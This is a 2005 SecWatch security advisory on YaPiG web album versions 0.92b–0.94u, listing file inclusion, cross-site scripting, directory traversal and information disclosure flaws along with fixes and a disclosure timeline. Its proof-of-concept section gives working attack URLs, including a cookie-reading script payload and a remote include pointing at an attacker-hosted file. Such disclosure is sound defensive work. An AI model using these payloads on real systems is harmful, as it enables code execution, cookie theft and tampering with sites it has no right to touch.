====================================================================== SecWatch 04/06/2005 YaPiG Remote Arbitrary File Inclusion, Cross-Site Scripting and Information Disclosure Vulnerabilities ====================================================================== Table of Contents Product Introduction.................................................1 Affected ............................................................2 Severity.............................................................3 Description of Vulnerability.........................................4 Proof of Concept.....................................................5 Solution.............................................................6 Time Line............................................................7 Credits..............................................................8 ====================================================================== 1) Introduction Homepage: http://yapig.sourceforge.net/ Overview: YaPiG is a simple but powerful web album. Advisory: http://secwatch.org/advisories/secwatch/20050530_yapig.txt SWID: 1010769 References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1881 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1882 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1883 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1884 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1885 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1886 http://www.osvdb.org/17115 http://www.osvdb.org/17116 http://www.osvdb.org/17117 http://www.osvdb.org/17118 http://www.osvdb.org/17119 http://www.osvdb.org/17120 http://www.osvdb.org/17121 http://securitytracker.com/alerts/2005/Jun/1014103.html http://secunia.com/advisories/15600/ http://www.securityfocus.com/bid/13874 http://www.securityfocus.com/bid/13875 http://www.securityfocus.com/bid/13876 http://www.securityfocus.com/bid/13877 ====================================================================== 2) Affected YaPiG version 0.92b, 0.93u and 0.94u. Prior versions may also be affected. ====================================================================== 3) Severity Rating: Less Critical Impact: Exposure of system information System access Manipulation of data Cross Site Scripting Where: From remote Action: Public disclosure ====================================================================== 4) Description of Vulnerabilities Multiple input validation and design vulnerabilities in YaPiG have been reported, which can be exploited by remote users to execute arbitrary code, conduct cross-site scripting attacks, disclose sensitive information, create and remove arbitrary directories and potentially gain administrative access to the web album. The "upload.php" script fails to verify the extension of uploaded images, a remote, authenticated user can upload arbitrary files (e.g. php files) to execute arbitrary commands on the target system with privileges of the target web server. Numerous scripts insecurely include scripts, if register_globals is enabled a remote, unauthenticated user can include arbitrary files from local and remote resources. The "view.php" script fails to correctly sanitise user-supplied input passed to the "phid" parameter, which a remote user can exploit to execute arbitrary script code in the security context of an affected website, as a result the code will be able to access any of the target user"s cookies, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user. The "view.php" script also fails to sanitise user-supplied input POSTed to various parameters when adding a new comment, which can also be exploited to conduct cross-site scripting attacks. The "view.php" script also discloses the full installation path upon a non-integer value being passed to the "phid" parameter. The "upload.php" script fails to validate user-supplied input passed to the "dir" parameter before being used in "rmdir()" and "mkdir()" calls. A remote, authenticated user can create and remove arbitrary directories outside of the gallery directory via the common "../" directory traversal characters. If "$USE_COOKIES=true;" is set (non-default) authentication details are stored in plain text in session cookies. A local user can access browser cookies to gain administrative access to the web album. Various other scripts/parameters are reportedly affected by similar issues. ====================================================================== 5) Proof of Concept Cross-Site Scripting: http://[target]/view.php?gid=1&phid=%22%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E Arbitrary File Inclusion: Version 0.92b: http://[target]/global.php?BASE_DIR=/local/path/to/global-gen.php Version 0.93u/ 0.94u: http://[target]/last_gallery.php?YAPIG_PATH=http://[attacker]/ Arbitrary Directory Removal: http://[target]/upload.php?step=rmdir&dir=../folder Arbitrary Directory Creation: http://[target]/upload.php?step=mkdir&dir=../folder Information Disclosure: http://[target]/view.php?gid=1&phid=alpha ====================================================================== 6) Solution Edit source manually to ensure user-supplied input is correctly sanitised. Filter malicious characters and character sequences via a HTTP proxy or firewall with URL filtering capabilities. Production systems should not display errors to clients. Set 'register_globals=Off' in php.ini. Use another product. ====================================================================== 7) Time Line 29/05/2005 - Infomation reported to SecWatch. 30/05/2005 - Information validated by SecWatch. Vendor notified, no response. 02/06/2005 - Vendor notified via alternative e-mail address, no response. 04/06/2005 - Public disclosure. 12/06/2005 - Vendor responded, advising patched version should be released [no ETA given]. 26/07/2005 - Vendor responded, advising new version (0.95.0) released to address issues. ====================================================================== 8) Credits Discovered by an anonymous person, reported via SecWatch.